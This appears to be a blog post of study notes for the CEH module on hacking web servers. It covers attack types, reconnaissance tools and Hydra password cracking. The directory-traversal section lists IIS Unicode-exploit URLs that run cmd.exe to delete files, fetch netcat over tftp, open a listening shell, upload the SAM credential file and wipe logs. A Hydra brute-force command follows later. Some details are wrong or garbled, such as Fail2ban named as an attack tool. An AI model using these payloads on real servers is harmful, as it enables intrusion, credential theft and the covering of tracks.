Contents

CEH-Module13 - Hacking Web Servers

Website Visitors:

What is Web Server

A web server is a software application that serves content (such as web pages, images, videos, etc.) to clients (usually web browsers) over the internet or a local network. It uses the Hypertext Transfer Protocol (HTTP) to communicate with clients and fulfill their requests.

Web Server File Structure

The file structure of a web server typically refers to the organization of files and directories (folders) on the server that are accessible to clients over the internet or a network. This structure is important for organizing web content and ensuring that web servers can serve files correctly. Here is a basic explanation of the typical file structure of a web server:

  1. Root Directory: The root directory is the top-level directory of the web server’s file structure. In many web servers, this is represented by a directory like /var/www/html in Linux or C:\inetpub\wwwroot in Windows.

  2. Web Content: The web content directory contains the files that make up the website, including HTML files, CSS stylesheets, JavaScript files, images, videos, and other media. These files are typically organized into subdirectories based on their type or purpose (e.g., /css for stylesheets, /images for images).

  3. Server Configuration Files: Configuration files control how the web server behaves and are typically located in a separate directory from the web content. Common configuration files include httpd.conf for Apache HTTP Server, nginx.conf for Nginx, and web.config for Microsoft Internet Information Services (IIS).

  4. Server Logs: Server logs record information about client requests, server responses, errors, and other relevant details. These logs are often stored in a separate directory from the web content for easier management and security.

  5. Scripting and Programming Files: If the website uses server-side scripting or programming languages (e.g., PHP, Python, Ruby), the files for these scripts are typically stored in a separate directory. This directory may also contain libraries, modules, and other dependencies used by the scripts.

  6. Temporary Files: Temporary files generated by the web server or web applications may be stored in a separate directory to prevent them from cluttering up the web content directory.

  7. Configuration Directories: Some web servers use additional directories for specific configurations or settings. For example, Apache HTTP Server may use directories like /etc/apache2 for global configurations and /etc/apache2/sites-available for virtual host configurations.

  8. Security and Access Control Files: Files related to security settings, access control rules, and SSL/TLS certificates are often stored in specific directories to ensure they are properly managed and protected.

  9. Backup Files: Backup files created by the web server or administrators for disaster recovery purposes may be stored in a separate directory to prevent them from being accidentally accessed or modified.

  10. Custom Directories: Depending on the specific requirements of the website or web application, custom directories may be created to store specific types of files or data.

Overall, the file structure of a web server is designed to organize files and directories in a way that makes it easy to manage, maintain, and serve web content to clients.

Why are Web Servers Attacked?

Web servers can be compromised for various reasons, including:

  • Outdated software: Running outdated versions of web server software, plugins, or modules that have known vulnerabilities.
  • Weak passwords: Using weak or default passwords for administrator accounts, FTP accounts, or database accounts.
  • Misconfigured servers: Incorrectly configured servers, such as allowing directory listing or not restricting access to sensitive files.
  • SQL injection: Allowing malicious SQL code to be injected into databases, often through user input.
  • Cross-site scripting (XSS): Allowing malicious code to be executed on a user’s browser, often through user input.
  • File inclusion vulnerabilities: Allowing an attacker to include malicious files or code on the server.
  • Unpatched vulnerabilities: Not applying security patches or updates to software, leaving known vulnerabilities open to exploitation.
  • Insufficient access controls: Not restricting access to sensitive areas of the server or application.
  • Malware and viruses: Allowing malware or viruses to infect the server, often through email or file uploads.
  • Poorly secured file uploads: Allowing users to upload malicious files, such as PHP backdoors or malware.
  • Lack of monitoring and logging: Not monitoring server logs or security events, making it difficult to detect and respond to security incidents.
  • Human error: Mistakes made by administrators, such as accidentally exposing sensitive information or configuring the server incorrectly.

To mitigate these risks, it’s important to keep web server software and other software up to date, use strong passwords, employ proper security configurations, and regularly monitor and audit server activity for signs of compromise.

Directory Traversal Attacks

A directory traversal attack, also known as path traversal, is a security exploit that targets web applications. It allows attackers to access files and directories on the server that they shouldn’t have permission to see. This can lead to sensitive information being exposed, such as:

  • Application source code: This can reveal vulnerabilities in the application and help attackers develop further exploits.
  • Configuration files: These files can contain usernames, passwords, and other sensitive information that can be used to gain further access to the system.
  • Operating system files: Accessing these files can give attackers complete control over the server.

Here’s how it works:

  1. Unsanitized user input: Web applications often take input from users, such as filenames or paths. If this input is not properly sanitized, attackers can inject special characters like “../” (dot-dot-slash), which tells the server to navigate one directory level up.
  2. Exploiting the vulnerability: By carefully crafting the input, attackers can navigate beyond the intended directory and access restricted areas of the server.
  3. Gaining unauthorized access: Once inside, attackers can steal data, install malware, or even take complete control of the server.

Impacts of Directory Traversal Attacks:

  • Data Theft: Attackers can steal sensitive information like user passwords, credit card details, or confidential documents.
  • Code Execution: In some cases, they might exploit further vulnerabilities to execute malicious code on the server, potentially leading to complete system compromise.
  • Website Defacement: Attackers can modify website content, displaying misleading information or promoting their own agenda.

Anyone who uses the website should be able to go in to the wwwRoot folder or navigate down the wwwRoot folder but not go up the folder structure.

Examples:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP://Victim-Website/scripts/..%C0%af../winnt/system32/cmd.exe?/c+del+c:\dont deleteme.txt
HTTP://Victim-Website/scripts/..%%C0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-+192.168.0.100+GET+nc.exe
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+nc+L+-p+79+d+e+cmd.exe
HTTP://Victim-Website/scripts/..%C0%af../winnt/system32/cmd.exe?/c+tftp+-i+192.168.0.100+GET+cleaniislog.exe
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\system32\logfiles\w3svc1
HTTP://Victim-Website/scripts/..жcosaf../winnt/system32/cmd.exe?/c+tftp+-1+192.168.0.100+put+c:\winnt\repair\sam
HTTP://Victim-Website/scripts/..%C0%af../winnt/system32/cmd.exe?/c+cleaniislog+c:\winnt\system32\logfiles\w3svc1\*******.log+192.168.20.1

`%c0%af` is unicode encoding for `/`

Website Defacement

Website defacement is a type of cyberattack where an attacker gains unauthorized access to a website and alters its content, often replacing it with their own message or image. It’s akin to digital graffiti, aiming to disrupt the website’s intended use and potentially damage its reputation.

Here’s a breakdown of website defacement:

What happens:

  • Attackers exploit vulnerabilities in the website’s security, such as weak passwords, outdated software, or unpatched security holes.
  • Once inside, they modify website files, typically HTML pages, to display their own content.
  • This content can vary depending on the attacker’s motives. It might be:
    • A political or social message
    • Offensive or obscene content
    • A “hacked by” message claiming credit
    • Redirects to malicious websites

Impacts of website defacement:

  • Loss of trust and reputation: A defaced website can damage its owner’s credibility and brand image. Users may perceive the site as unsafe or unprofessional.
  • Financial losses: Defacement can disrupt business operations, leading to lost sales and revenue. It can also incur costs for cleanup and security repairs.
  • SEO damage: Search engines may penalize defaced websites, affecting their visibility and organic search ranking.
  • Data breaches: In some cases, attackers may use defacement as a stepping stone to access sensitive data on the website.

Motives of attackers:

  • Vandalism: Some attackers simply want to cause disruption or express their displeasure with the website’s owner or content.
  • Hacktivism: Groups with political or social agendas may deface websites to raise awareness about their cause.
  • Self-promotion: Some attackers deface websites to gain notoriety or promote themselves or their group.
  • Financial gain: In rare cases, attackers may use defacement to redirect users to malicious websites or install malware to steal financial information.

By understanding the risks and taking proactive steps, website owners can significantly reduce the chances of falling Victim-Website to website defacement and protect their online presence.

Web Server Misconfiguration

Web server misconfiguration refers to errors or oversights in the configuration of a web server that can lead to security vulnerabilities or operational issues. Misconfigurations can occur in various parts of the server setup, including the web server software, operating system, network settings, and security configurations. Some common examples of web server misconfigurations include:

  1. Directory Listing: If directory listing is enabled and there is no default index file (e.g., index.html), the server may list all files in a directory, potentially exposing sensitive information.

  2. File and Directory Permissions: Incorrect permissions on files and directories can allow unauthorized access or modification.

  3. Default Credentials: Using default or weak credentials for server administration interfaces can lead to unauthorized access.

  4. SSL/TLS Configuration: Incorrectly configured SSL/TLS settings can lead to weak encryption, exposing sensitive data to interception.

  5. Cross-Origin Resource Sharing (CORS): Improper CORS configuration can allow unauthorized websites to access sensitive resources.

  6. Server Side Includes (SSI): Improperly configured SSI directives can lead to code execution vulnerabilities.

  7. PHP Configuration: Incorrect PHP settings can lead to security vulnerabilities, such as allowing the execution of arbitrary code.

  8. Open Ports: Unnecessary ports left open can increase the attack surface of the server.

  9. Error Handling: Improper error handling can reveal sensitive information about the server or application.

  10. Backup Configuration: Insecure backup configurations can lead to data loss or unauthorized access to backups.

By proactively managing and securing web server configurations, administrators can reduce the likelihood of security breaches and ensure the smooth operation of their web servers.

HTTP Response-Splitting Attack

An HTTP response splitting attack is a type of web security vulnerability that exploits weaknesses in how web servers handle user-supplied data within HTTP response headers. It allows attackers to inject malicious code into these headers, potentially taking control of user browsers, stealing sensitive information, or defacing websites.

Here’s how it works:

  1. Attacker Input: The attacker crafts malicious input containing special characters like carriage returns (CR) and line feeds (LF) into a user field that the web application processes.
  2. Vulnerable Server: The web server fails to properly sanitize the user input, allowing the CR/LF characters to be included in the HTTP response headers.
  3. Header Splitting: The browser interprets the injected CR/LF as the end of the header, creating a new, attacker-controlled header.
  4. Exploitation: The attacker uses the injected header to perform various malicious actions, such as:
    • Cross-site scripting (XSS): Injects malicious scripts into the response, compromising user sessions or stealing data.
    • Cookie injection: Creates a new cookie with unauthorized privileges or steals existing cookies.
    • Host header injection: Redirects users to a malicious website.
    • Content injection: Modifies the website content displayed to the user.

Impact of HTTP Response Splitting:

This attack can have severe consequences, including:

  • Data breaches: Attackers can steal sensitive user information like passwords, credit card details, or personal data.
  • Website defacement: Attackers can modify website content to display misleading information or promote their own agenda.
  • Malware distribution: Attackers can inject malicious scripts that spread malware to users’ devices.
  • Loss of trust and reputation: Websites experiencing these attacks can suffer significant damage to their reputation and brand image.

Web Cache Poisoning Attack

Web cache poisoning is a technique used by attackers to manipulate the cache of a web application or a proxy server in order to serve malicious content to users. This can lead to a variety of security issues, such as spreading malware, conducting phishing attacks, or even taking complete control of a website.

Here’s how a web cache poisoning attack is typically carried out:

  1. Identifying a Vulnerable Cache: Attackers first identify a web application or proxy server that uses caching and is vulnerable to cache poisoning.

  2. Crafting a Poisoned Request: The attacker crafts a request to the target server that contains malicious content, such as a specially crafted HTTP header or parameter. This request is designed to be stored in the cache.

  3. Injecting the Poisoned Request: The attacker sends the poisoned request to the target server. If the server accepts the request and stores it in the cache, the malicious content becomes part of the cached data.

  4. Serving the Poisoned Content: When a legitimate user requests the same content from the cache, the server serves the poisoned content instead. This could be a phishing page, malware download, or other malicious content.

  5. Exploiting the Poisoned Content: Depending on the nature of the attack, the attacker can exploit the poisoned content to steal sensitive information, spread malware, or carry out other malicious activities.

To defend against web cache poisoning attacks, it’s important to regularly update and patch caching servers, use secure coding practices to prevent injection attacks, and monitor for unusual or malicious activity in the cache.

SSH Brute Force Attack

An SSH (Secure Shell) brute force attack is a type of cyber attack in which an attacker attempts to gain unauthorized access to a remote server by systematically trying different username and password combinations. SSH is a protocol used for secure remote access to servers and is commonly used by administrators to manage servers remotely.

Here’s how an SSH brute force attack typically works:

  1. Enumeration: The attacker scans the internet for servers that have SSH enabled and are accessible over the internet.

  2. Brute Force: The attacker uses automated tools (such as Hydra, Ncrack, or Fail2ban) to try a large number of username and password combinations in rapid succession.

  3. Authentication Attempts: For each attempt, the attacker sends a login request to the server, trying different combinations until a successful login is achieved or until all combinations have been exhausted.

  4. Access: If the attacker successfully guesses a valid username and password combination, they gain unauthorized access to the server and can potentially carry out malicious activities, such as installing malware, stealing data, or disrupting services.

Web Server Password Cracking

Web server password cracking is a form of cyber attack where an attacker attempts to gain unauthorized access to a web server by systematically guessing the server’s password. This type of attack is typically carried out using automated tools that can try thousands or even millions of password combinations in a short amount of time.

Brutus is a software to brute force web server passwords from a list of usernames and passwords.

Here’s how web server password cracking works:

  1. Enumeration: The attacker first identifies the target web server and gathers information about it, such as the server’s IP address, the software it is running, and any usernames that may be valid.

  2. Password Guessing: The attacker then uses automated tools, such as brute force or dictionary attacks, to guess the server’s password. Brute force attacks try every possible combination of characters, while dictionary attacks use a list of common passwords.

  3. Authentication Attempts: For each password guess, the attacker sends a login request to the server, trying to authenticate as a valid user.

  4. Access: If the attacker successfully guesses the server’s password, they gain unauthorized access to the server and can potentially carry out malicious activities, such as stealing data, installing malware, or disrupting services.

To protect against web server password cracking attacks, server administrators can take several measures:

  1. Use Strong Passwords: Use long, complex, and unique passwords for server accounts to make it harder for attackers to guess them.

  2. Implement Multi-Factor Authentication (MFA): Use MFA to add an extra layer of security, requiring users to provide additional verification, such as a code sent to their phone, in addition to their password.

  3. Limit Login Attempts: Implement mechanisms to limit the number of failed login attempts from a single IP address, which can help prevent brute force attacks.

  4. Monitor Logs: Regularly monitor server logs for unusual login patterns or failed login attempts.

  5. Update Software: Keep server software and other software up to date to protect against known vulnerabilities.

By implementing these measures, server administrators can significantly reduce the risk of web server password cracking attacks and protect their servers from unauthorized access.

WebServer Attack Methodology

Information Gathering, Web Server Footprinting, Website Mirroring, Vulnerability Scanning, Session Hijacking and Web Servers Password Hacking.

Robots.txt File

The robots.txt file is a text file placed in the root directory of a website to instruct web robots (also known as crawlers, spiders, or bots) how to crawl and index its pages. Web robots are automated programs used by search engines to discover and index content on the internet.

The robots.txt file contains directives that specify which parts of the website should not be crawled or indexed by search engines. It can also include directives that specify the location of the website’s XML sitemap, which provides a list of URLs that the website owner wants the search engine to index.

The robots.txt file follows a specific syntax and can include the following directives:

  • User-agent: Specifies the robot to which the following directives apply. For example, User-agent: * applies to all robots, while User-agent: Googlebot applies only to Google’s crawler.
  • Disallow: Specifies URLs that should not be crawled. For example, Disallow: /private/ tells robots not to crawl any URLs in the /private/ directory.
  • Allow: Specifies URLs that can be crawled even if they are in a disallowed directory. For example, Allow: /public/ allows robots to crawl URLs in the /public/ directory.
  • Sitemap: Specifies the location of the XML sitemap. For example, Sitemap: https://www.example.com/sitemap.xml tells robots where to find the sitemap.

It’s important to note that the robots.txt file is a voluntary mechanism for controlling how search engines crawl and index a website. While most reputable search engines honor the directives in the robots.txt file, malicious bots or those from less reputable sources may not. Therefore, the robots.txt file should not be used as a security measure to protect sensitive content.

Enumerate Web Server Information Using Nmap

To enumerate web server information using Nmap, you can use various parameters and scripts. Here are some common parameters and scripts you can use:

  1. Parameter -sV: This parameter enables version detection, which allows Nmap to determine the version of the web server running on the target host. Use it like this:

    1
    
    nmap -sV <target_ip>
    
  2. Parameter -p: Use this parameter to specify the port or range of ports to scan. For example, to scan ports 80 (HTTP) and 443 (HTTPS), you would use:

    1
    
    nmap -sV -p 80,443 <target_ip>
    
  3. Nmap Scripting Engine (NSE): Nmap provides a scripting engine that allows you to use pre-written scripts to automate tasks. There are several scripts available for enumerating web server information. For example:

    • http-enum.nse: This script enumerates directories, files, and other information from web servers.

      1
      
      nmap --script=http-enum <target_ip>
      
    • http-headers.nse: This script retrieves HTTP headers from web servers.

      1
      
      nmap --script=http-headers <target_ip>
      
    • http-title.nse: This script retrieves the title of web pages served by web servers.

      1
      
      nmap --script=http-title <target_ip>
      
    • http-methods.nse: This script enumerates HTTP methods supported by web servers.

      1
      
      nmap --script=http-methods <target_ip>
      
    • http-server-header.nse: This script retrieves the server header from HTTP responses.

      1
      
      nmap --script=http-server-header <target_ip>
      
    • http-robots.txt.nse: This script retrieves the contents of the robots.txt file, if present, from web servers.

      1
      
      nmap --script=http-robots.txt <target_ip>
      

    These scripts can provide valuable information about the web server configuration, which can be useful for further enumeration and assessment.

Along with these scripts we also have http-enum, http-frontpage-login and more.

Finding Default content on WebServer

DirBuster - DirBuster is a tool used for brute-force discovery of directories and files on web servers. It helps in finding hidden content by trying various combinations of common directory and file names.

Dirhunt is a web crawler that helps identify and analyze web directories, files, and folders. It’s often used by security professionals and penetration testers to:

  • Discover hidden or non-linked directories and files
  • Identify potential vulnerabilities and weaknesses
  • Map out the structure of a web application
  • Find sensitive information that may be exposed

Dirhunt can be used to crawl a website and identify directories and files that may not be intended for public access, such as backup files, configuration files, or sensitive data.

Nikto2 is a web server scanner that scans for vulnerabilities and gathers information about a web server. Here are some key features:

  • Scans for over 6,700 potential vulnerabilities
  • Identifies installed plugins and software
  • Detects outdated versions of software
  • Checks for misconfigured files and directories
  • Performs a variety of other web server checks

Nikto2 is often used by security professionals and penetration testers to identify potential security issues in web servers.

Detecting WebServer Hacking Attempts

Directory Monitor is a software tool that monitors file system changes in real-time. It can track changes to files, directories, and network shares, and can alert users or take actions when changes occur.

Gather Website Information Using GhostEye and skipfish

Ghost Eye is an information-gathering tool written in Python 3. To run, Ghost Eye only needs a domain or IP. Ghost Eye can work with any Linux distros if they support Python 3.

Ghost Eye gathers information such as Whois lookup, DNS lookup, EtherApe, Nmap port scan, HTTP header grabber, Clickjacking test, Robots.txt scanner, Link grabber, IP location finder, and traceroute.

Run ghosteye tool in the parrot/linux os. It will prompt you to enter a website name and then it prompts you to enter options for selecting dns lookup, whois lookup, nmap port scan, clickjacking and more..

Skipfish is an active web application (deployed on a webserver) security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.

In your windows machine install wampserver. This will create a website. In your parrot os install skipfish software and run the command, skipfish -o /home/attacker/test -S /usr/share/skipfish/dictionaries/complete.wl http://[IP Address of Windows Server 2022]:8080. On receiving this command, Skipfish performs a heavy brute-force attack on the web server by using the complete.wl dictionary file, creates a directory named test in the root location, and stores the result in index.html inside this location.

This will list all the vulnerabilities on the web server. Go through the list and patch your server accordingly.

Gather Website Information Using httprecon tool

Install httprecon gui software in windows software and run it. When opened, enter the website URL and wait for few mins for it to show the output. In the output details, you can see the web server details.

Gather Website Server Information Using NetCat and Telnet

Netcat:

nc -vv www.google.com 80 hit enter

You wont see any reply. On the screen hit GET / HTTP/1.0 and hit enter twice. Netcat will perform the banner grabbing and gather information such as content type, last modified date, accept ranges, ETag, and server information.

Telnet:

telnet www.google.com 80 hit enter

once telnet is connected, enter GET / HTTP/1.0 and hit enter twice. Telnet will perform the banner grabbing and gather information such as content type, last modified date, accept ranges, ETag, and server information.

Gather Website Information using Nmap

  • nmap -sV --script=http-enum www.google.com - This script enumerates and provides you with the output details.
  • nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- www.goodshopping.com - This script discovers the hostnames that resolve the targeted domain.
  • Perform an HTTP trace on the targeted domain. In the terminal window, type nmap --script http-trace -d www.goodshopping.com and press Enter.
  • Check whether Web Application Firewall is configured on the target host or domain. In the terminal window, type nmap -p80 --script http-waf-detect www.goodshopping.com and press Enter.

Gather Website Information using uniscan software in Parrot OS

Uniscan is a web vulnerability scanner tool that not only performs simple commands like ping, traceroute, and nslookup, but also does static, dynamic, and stress checks on a web server. Apart from scanning websites, uniscan also performs automated Bing and Google searches on provided IPs. Uniscan takes all of this data and combines them into a comprehensive report file for the user.

In the terminal window, type uniscan -u http://< webserverip >:8080/CEH -q and hit Enter to start scanning for directories. In the above command, the -u switch is used to provide the target URL, and the -q switch is used to scan the directories in the web server.

Type uniscan -u http://< webserverip >:8080/CEH -q and hit Enter. Here -w and -e are used together to enable the file check (robots.txt and sitemap.xml file)

Use the -d parameter to start a dynamic scan: Type uniscan -u http://< webserverip >:8080/CEH -d and hit Enter

Crack FTP Credentials using THC Hydra

A dictionary or wordlist contains thousands of words that are used by password cracking tools to break into a password-protected system. An attacker may either manually crack a password by guessing it or use automated tools and techniques such as the dictionary method. Most password cracking techniques are successful, because of weak or easily guessable passwords.

Create wordlist files containing username and password combinations for ftp login.

In the terminal window, type hydra -L /home/user01/Desktop/Wordlists/Usernames.txt -P /home/user01/Desktop/Wordlists/Passwords.txt ftp://[IP Address of FTP Server] and press Enter.

Your inbox needs more DevOps articles.

Subscribe to get our latest content by email.